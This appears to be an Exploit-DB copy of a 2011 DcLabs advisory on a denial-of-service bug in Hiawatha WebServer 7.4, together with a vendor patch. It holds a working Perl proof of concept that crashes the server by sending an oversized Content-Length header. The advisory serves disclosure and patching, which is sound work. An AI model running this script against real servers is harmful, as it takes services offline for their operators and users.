Hiawatha WebServer 7.4 - Denial of Service

EDB-ID:

16939

CVE:





Platform:

Multiple

Date:

2011-03-07


Source: http://packetstormsecurity.org/files/view/99021/DCA-2011-0006.txt

[Discussion]
- DcLabs Security Research Group advises about the following vulnerability(ies):

[Software]
- Hiawatha WebServer 7.4

[Vendor Product Description]
- Hiawatha is an open source webserver with a focus on security. I
started Hiawatha in January 2002. Before that time, I had used several
webservers, but I didn't like them. They had unlogical, almost cryptic
configuration syntax and none of them gave me a good feeling about
their security and robustness. So, I decided it was time to write my
own webserver. I never thought that my webserver would become what it
is today, but I enjoyed working on it and liked to have my own open
source project. In the years that followed, Hiawatha became a fully
functional webserver.

- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz

[Advisory Timeline]

- 02/24/2011 -> Advisory sent to vendor.
- 02/24/2011 -> Vendor response.
- 02/25/2011 -> Patch suggested by vendor.
- 03/04/2011 -> Advisory published.

[Bug Summary]

- Content-Length entity-header filed miscalculation.

[Impact]

- Low

[Affected Version]

- 7.4
- Prior versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]

- The web server crashes while sending specially crafted HTTP requests
leading to Denial of Service.

[PoC]

# Hiawatha Web Server 7.4
#!/usr/bin/perl
use IO::Socket;
        if (@ARGV < 1) {
                usage();
        }
        $ip     = $ARGV[0];
        $port   = $ARGV[1];
        print "[+] Sending request...\n";
        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "OPTIONS * HTTP/1.1\r\n";
        print $socket "Host: http://www.dclabs.com.br\r\n";
        print $socket "Content-Length: 2147483599\r\n\r\n";
        sleep(3);
        close($socket);
        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
        exit;
}

All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br

[Patch(s) / Workaround]

-- hiawatha.c --

-- BEGIN --
20a21
> #include <limits.h>
421c422
<                                                       if
(content_length < 0) {
---
>                                       if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {
-- END --

[Greetz]

DcLabs Security Research Group.

--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br